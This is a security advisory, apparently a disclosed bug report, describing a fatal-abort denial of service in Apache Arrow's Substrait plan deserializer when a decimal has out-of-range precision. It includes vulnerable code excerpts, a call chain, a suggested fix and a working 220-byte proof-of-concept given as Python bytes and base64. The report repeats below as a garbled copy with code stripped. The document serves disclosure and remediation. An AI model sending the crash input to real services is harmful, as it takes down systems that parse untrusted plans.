Summary
A 220-byte Substrait Plan describing a decimal type with precision outside
[1, 38] (the PoC uses 42) fed to the public arrow::engine::DeserializePlan
API aborts the process. FromProtoImpl<Decimal128Type> constructs the type via
make_shared, bypassing the validating Decimal128Type::Make() factory, so the
constructor's ARROW_CHECK_OK(ValidateDecimalPrecision(...)) fires a fatal abort
instead of returning Status::Invalid. Any service that deserializes an
untrusted Substrait plan can be crashed (denial of service).
Tested at pinned commit 16fe34250a2ef261790b9cc414fdf0831669cf9f
(25.0.0-SNAPSHOT).
Root Cause
Arrow's Substrait type converter maps a substrait::Type::Decimal to an
arrow::Decimal128Type through the generic helper FromProtoImpl<Decimal128Type>,
which calls std::make_shared<Decimal128Type>(precision, scale) directly — i.e.
it invokes the constructor, not the validating factory Decimal128Type::Make().
Decimal128Type::Make() validates the precision and returns
Status::Invalid("Decimal precision out of range [1, 38]: ...") on bad input.
The constructor, by contrast, asserts: ARROW_CHECK_OK(ValidateDecimalPrecision(...))
is a fatal check that calls std::abort() (via ArrowLog / CerrLog::~CerrLog)
when validation fails. Because the Substrait decimal.precision() is an
attacker-controlled int32 taken straight from the protobuf, any value outside
[1, 38] aborts the process.
Vulnerable code — the bypass (cpp/src/arrow/engine/substrait/type_internal.cc:55-61, 171-175):
template <typename ArrowType, typename TypeMessage, typename... A>
Result<std::pair<std::shared_ptr<DataType>, bool>> FromProtoImpl(const TypeMessage& type,
A&&... args) {
return std::make_pair(std::static_pointer_cast<DataType>(
std::make_shared<ArrowType>(std::forward<A>(args)...)),
IsNullable(type));
}
...
case substrait::Type::kDecimal: {
const auto& decimal = type.decimal();
return FromProtoImpl<Decimal128Type>(decimal, decimal.precision(), decimal.scale());
}
Vulnerable code — the fatal check (cpp/src/arrow/type.cc:1520-1523):
Decimal128Type::Decimal128Type(int32_t precision, int32_t scale)
: DecimalType(type_id, 16, precision, scale) {
ARROW_CHECK_OK(ValidateDecimalPrecision<Decimal128Type>(precision)); // fatal abort
}
Decimal128Type::Make() (immediately below the constructor) is the non-fatal
path that returns Status::Invalid for the same condition; the Substrait
converter does not use it.
Call chain (DeserializePlan -> decimal field):
arrow::engine::DeserializePlan serde.cc:229 (public API)
-> FromProto(Rel) relation_internal.cc:400
-> FromProto(NamedStruct) type_internal.cc:523
-> FieldsFromProto type_internal.cc:93
-> FromProto(Type) type_internal.cc:174
-> FromProtoImpl<Decimal128Type> type_internal.cc:59 // make_shared, bypasses Make()
-> Decimal128Type::Decimal128Type type.cc:1522 // ARROW_CHECK_OK -> abort
PoC
220 bytes — a Plan whose NamedStruct declares a decimal field with
precision = 42 (outside [1, 38]). The byte sequence c2 01 04 08 02 10 2a
encodes substrait.Type.decimal (field 24) with precision (field 2) = 0x2a
= 42.
# generate_poc.py — re-create the crash input from bytes
poc = (b'\x1a\xcc\x01\n\xc9\x01\n\xc6\x01\x12\xbe\x01\n\x02c0\n\x02c1\n\x02c2'
b'\n\x02c3\n\x02c4\n\x02c5\n\x02c6\n\x02c7\n\x02c8\n\x02c9\n\x03c10'
b'\n\x03c11\n\x03c12\n\x03c13\n\x03c14\n\x03c15\n\x03c16\n\x03c17'
b'\x12l\n\x02\n\x00\n\x02\x12\x00\n\x02\x1a\x00\n\x02*\x00\n\x02:\x00'
b'\n\x02R\x00\n\x02Z\x00\n\x02b\x00\n\x02j\x00\n\x02r\x00\n\x03\x82'
b'\x01\x00\n\x03\x8a\x01\x00\n\x07\xc2\x01\x04\x08\x02\x10*\n\x05\xaa'
b'\x01\x02\x08\x04\n\x05\xb2\x01\x02\x08\x08\n\x07\xda\x01\x04\n\x02:'
b'\x00\n\x0b\xe2\x01\x08\n\x02b\x00\x12\x02:\x00\n\x0b\xca\x01\x08\n'
b'\x02*\x00\n\x02b\x00:\x03\n\x01t2\x0b\x10,*\x07o2-seed')
open("poc.bin", "wb").write(poc)
Crash input size: 220 bytes (poc/poc.bin, md5 b2ae2aac5e277e07f5ea16901e088b4a).
Reproduction
Build Arrow C++ from source with -DARROW_SUBSTRAIT=ON and AddressSanitizer, then deserialize the
attached Substrait plan through the public API:
#include <arrow/engine/substrait/serde.h>
// auto buf = ...read poc.bin...;
auto result = arrow::engine::DeserializePlan(*buf); // fatal ARROW_CHECK abort here
The decimal type converter FromProtoImpl<Decimal128Type> builds the type via
std::make_shared<Decimal128Type>(precision, scale), bypassing the validating Decimal128Type::Make()
factory; the ctor's ARROW_CHECK_OK(ValidateDecimalPrecision(...)) aborts on precision 42 (outside [1,38]):
type.cc: Check failed: _s.ok() ... Decimal precision out of range [1, 38]: 42
make_shared<...> bypass is still present in current master (cpp/src/arrow/engine/substrait/type_internal.cc:59).
PoC: 220 bytes (recreate from the base64 below).
Suggested Fix
Route the decimal conversion through the validating factory
Decimal128Type::Make() (which returns Status::Invalid on out-of-range
precision) instead of constructing via make_shared:
--- a/cpp/src/arrow/engine/substrait/type_internal.cc
+++ b/cpp/src/arrow/engine/substrait/type_internal.cc
@@
case substrait::Type::kDecimal: {
const auto& decimal = type.decimal();
- return FromProtoImpl<Decimal128Type>(decimal, decimal.precision(), decimal.scale());
+ ARROW_ASSIGN_OR_RAISE(
+ auto dtype, Decimal128Type::Make(decimal.precision(), decimal.scale()));
+ return std::make_pair(std::move(dtype), IsNullable(decimal));
}
This propagates a non-OK Status out of DeserializePlan on malformed precision
rather than aborting. Other FromProtoImpl<...> arms that wrap constructors with
fatal checks deserve the same audit, but only the decimal path is reproduced here.
PoC bytes (self-contained)
The trigger input is 220 bytes (poc/poc.bin).
Recreate it exactly with:
base64 -d > poc.bin <<'B64'
GswBCskBCsYBEr4BCgJjMAoCYzEKAmMyCgJjMwoCYzQKAmM1CgJjNgoCYzcKAmM4CgJjOQoDYzEwCgNjMTEKA2MxMgoDYzEzCgNj
MTQKA2MxNQoDYzE2CgNjMTcSbAoCCgAKAhIACgIaAAoCKgAKAjoACgJSAAoCWgAKAmIACgJqAAoCcgAKA4IBAAoDigEACgfCAQQI
AhAqCgWqAQIIBAoFsgECCAgKB9oBBAoCOgAKC+IBCAoCYgASAjoACgvKAQgKAioACgJiADoDCgF0MgsQLCoHbzItc2VlZA==
B64
Credit
Aisle Research (Ze Sheng (O2Lab & TAMU), Dmitrijs Trizna, Luigino Camastra, Guido Vranken).
Summary
A 220-byte Substrait
Plandescribing a decimal type with precision outside[1, 38](the PoC uses 42) fed to the publicarrow::engine::DeserializePlanAPI aborts the process.
FromProtoImpl<Decimal128Type>constructs the type viamake_shared, bypassing the validatingDecimal128Type::Make()factory, so theconstructor's
ARROW_CHECK_OK(ValidateDecimalPrecision(...))fires a fatal abortinstead of returning
Status::Invalid. Any service that deserializes anuntrusted Substrait plan can be crashed (denial of service).
Tested at pinned commit
16fe34250a2ef261790b9cc414fdf0831669cf9f(25.0.0-SNAPSHOT).
Root Cause
Arrow's Substrait type converter maps a
substrait::Type::Decimalto anarrow::Decimal128Typethrough the generic helperFromProtoImpl<Decimal128Type>,which calls
std::make_shared<Decimal128Type>(precision, scale)directly — i.e.it invokes the constructor, not the validating factory
Decimal128Type::Make().Decimal128Type::Make()validates the precision and returnsStatus::Invalid("Decimal precision out of range [1, 38]: ...")on bad input.The constructor, by contrast, asserts:
ARROW_CHECK_OK(ValidateDecimalPrecision(...))is a fatal check that calls
std::abort()(viaArrowLog/CerrLog::~CerrLog)when validation fails. Because the Substrait
decimal.precision()is anattacker-controlled
int32taken straight from the protobuf, any value outside[1, 38]aborts the process.Vulnerable code — the bypass (
cpp/src/arrow/engine/substrait/type_internal.cc:55-61, 171-175):Vulnerable code — the fatal check (
cpp/src/arrow/type.cc:1520-1523):Decimal128Type::Make()(immediately below the constructor) is the non-fatalpath that returns
Status::Invalidfor the same condition; the Substraitconverter does not use it.
Call chain (
DeserializePlan-> decimal field):PoC
220 bytes — a
PlanwhoseNamedStructdeclares a decimal field withprecision = 42(outside[1, 38]). The byte sequencec2 01 04 08 02 10 2aencodes
substrait.Type.decimal(field 24) withprecision(field 2) =0x2a= 42.
Crash input size: 220 bytes (
poc/poc.bin, md5b2ae2aac5e277e07f5ea16901e088b4a).Reproduction
Build Arrow C++ from source with
-DARROW_SUBSTRAIT=ONand AddressSanitizer, then deserialize theattached Substrait plan through the public API:
The decimal type converter
FromProtoImpl<Decimal128Type>builds the type viastd::make_shared<Decimal128Type>(precision, scale), bypassing the validatingDecimal128Type::Make()factory; the ctor's
ARROW_CHECK_OK(ValidateDecimalPrecision(...))aborts on precision 42 (outside [1,38]):make_shared<...>bypass is still present in currentmaster(cpp/src/arrow/engine/substrait/type_internal.cc:59).PoC: 220 bytes (recreate from the base64 below).
Suggested Fix
Route the decimal conversion through the validating factory
Decimal128Type::Make()(which returnsStatus::Invalidon out-of-rangeprecision) instead of constructing via
make_shared:This propagates a non-OK
Statusout ofDeserializePlanon malformed precisionrather than aborting. Other
FromProtoImpl<...>arms that wrap constructors withfatal checks deserve the same audit, but only the decimal path is reproduced here.
PoC bytes (self-contained)
The trigger input is 220 bytes (
poc/poc.bin).Recreate it exactly with:
Credit
Aisle Research (Ze Sheng (O2Lab & TAMU), Dmitrijs Trizna, Luigino Camastra, Guido Vranken).